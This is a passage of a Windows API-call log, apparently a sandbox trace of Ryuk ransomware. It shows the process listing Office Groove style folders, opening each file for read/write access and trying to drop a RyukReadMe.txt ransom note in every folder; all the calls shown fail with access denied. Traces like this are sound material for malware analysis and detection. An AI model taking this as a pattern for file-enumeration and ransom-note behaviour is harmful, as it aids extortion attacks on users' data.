(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.094] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.094] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.094] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.094] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.094] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.094] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.095] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.095] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.095] SetLastError (dwErrCode=0x0) [0137.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.095] GetLastError () returned 0x5 [0137.095] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.095] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.095] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.095] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert.css", dwFileAttributes=0x80) returned 0 [0137.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.096] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.097] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.097] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.097] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Earthy.css", dwFileAttributes=0x80) returned 0 [0137.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Earthy.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\earthy.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.097] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.097] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.097] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.097] SetLastError (dwErrCode=0x0) [0137.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.097] GetLastError () returned 0x5 [0137.097] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.097] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.098] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.098] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.098] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.098] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.098] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.098] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.098] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.098] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.099] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.099] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.099] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.099] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.100] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.100] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.100] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.100] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.100] SetLastError (dwErrCode=0x0) [0137.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.100] GetLastError () returned 0x5 [0137.100] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.100] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.100] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.100] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck.css", dwFileAttributes=0x80) returned 0 [0137.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.101] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.101] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.101] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.101] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GreenTea.css", dwFileAttributes=0x80) returned 0 [0137.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\greentea.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.102] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.102] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.102] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.102] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\LightSpirit.css", dwFileAttributes=0x80) returned 0 [0137.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lightspirit.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.103] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.103] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.103] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.103] SetLastError (dwErrCode=0x0) [0137.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.104] GetLastError () returned 0x5 [0137.104] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.104] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.104] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.104] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.104] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.104] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.105] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.105] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.105] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.105] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.105] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.105] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.105] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.105] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.105] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.106] SetLastError (dwErrCode=0x0) [0137.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.106] GetLastError () returned 0x5 [0137.106] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.106] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.106] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.106] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime.css", dwFileAttributes=0x80) returned 0 [0137.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.106] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.106] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.106] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.106] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.107] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Maroon.css", dwFileAttributes=0x80) returned 0 [0137.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Maroon.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\maroon.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.107] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.107] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.107] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.107] SetLastError (dwErrCode=0x0) [0137.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.107] GetLastError () returned 0x5 [0137.107] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.107] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.107] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.108] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.108] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.108] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.108] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.109] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.109] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.109] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.109] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.109] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.109] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.109] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.110] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.110] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.110] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.110] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.110] SetLastError (dwErrCode=0x0) [0137.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.110] GetLastError () returned 0x5 [0137.110] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.110] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.110] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.110] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis.css", dwFileAttributes=0x80) returned 0 [0137.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.111] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.111] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.111] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.111] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.111] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 